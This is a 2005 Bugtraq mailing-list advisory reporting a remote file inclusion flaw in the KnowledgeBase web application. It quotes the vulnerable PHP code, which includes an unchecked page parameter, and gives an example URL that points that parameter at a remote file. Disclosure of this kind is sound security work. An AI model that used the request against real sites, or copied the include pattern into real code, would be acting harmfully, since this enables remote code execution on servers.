[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: KnowledgeBase
From: Francisco Alisson <dominusvis () click21 ! com ! br>
Date: 2005-03-12 12:15:47
Message-ID: 20050312121547.31019.qmail () www ! securityfocus ! com
[Download RAW message or body]
Remote File Inclusion
KnowledgeBase
Vendor: www.activecampaign.com/kb/
Well, inside the index.php file we can see:
if ($page == ""){
$page = "startup";
}
@include("$page.php");
?>
After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]
Dominus_Vis
[Infektion Group]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic